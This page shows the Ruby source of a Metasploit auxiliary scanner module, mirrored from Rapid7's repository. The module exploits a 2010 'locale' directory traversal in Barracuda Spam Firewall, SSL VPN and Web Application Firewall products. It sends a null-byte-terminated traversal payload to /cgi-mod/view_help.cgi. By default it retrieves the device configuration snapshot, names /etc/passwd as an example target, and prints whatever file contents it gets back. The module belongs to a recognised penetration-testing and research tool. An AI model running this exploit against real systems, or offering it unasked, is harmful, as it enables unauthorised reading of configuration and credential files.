Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb
23913 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize

12
    super(

13
      'Name' => 'Barracuda Multiple Product "locale" Directory Traversal',

14
      'Description' => %q{

15
          This module exploits a directory traversal vulnerability present in

16
        several Barracuda products, including the Barracuda Spam and Virus Firewall,

17
        Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,

18
        this module will attempt to download the Barracuda configuration file.

19
      },

20
      'References' => [

21
        ['CVE', '2010-20109'],

22
        ['OSVDB', '68301'],

23
        ['URL', 'https://web.archive.org/web/20101004131244/http://secunia.com/advisories/41609/'],

24
        ['EDB', '15130']

25
      ],

26
      'Author' => [

27
        'Tiago Ferreira <tiago.ccna[at]gmail.com>'

28
      ],

29
      'DisclosureDate' => 'Oct 08 2010',

30
      'License' => MSF_LICENSE

31
    )

32


33
    register_options(

34
      [

35
        Opt::RPORT(8000),

36
        OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),

37
        OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),

38
      ]

39
    )

40
  end

41


42
  def run_host(ip)

43
    uri = normalize_uri(target_uri.path)

44
    file = datastore['FILE']

45
    payload = "?locale=/../../../../../../..#{file}%00"

46


47
    print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")

48


49
    res = send_request_raw(

50
      {

51
        'method' => 'GET',

52
        'uri' => uri + payload,

53
      }, 25

54
    )

55


56
    if res.nil?

57
      print_error("#{full_uri} - Connection timed out")

58
      return

59
    end

60


61
    if (res.code == 200 and res.body)

62
      if res.body.match(/\<html\>(.*)\<\/html\>/im)

63
        html = $1

64


65
        if res.body =~ /barracuda\.css/

66
          if html.length > 100

67
            file_data = html.gsub(%r{</?[^>]+?>}, '')

68


69
            print_good("#{full_uri} - Barracuda - Vulnerable")

70
            print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")

71
          else

72
            print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")

73
          end

74
        elsif res.body =~ /help_page/

75
          print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")

76
        else

77
          print_error("#{full_uri} - Barracuda - File not found or permission denied")

78
        end

79
      else

80
        print_error("#{full_uri} - Barracuda - No HTML was returned")

81
      end

82
    else

83
      print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")

84
    end

85
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

86
  rescue ::Timeout::Error, ::Errno::EPIPE

87
  end

88
end

89


90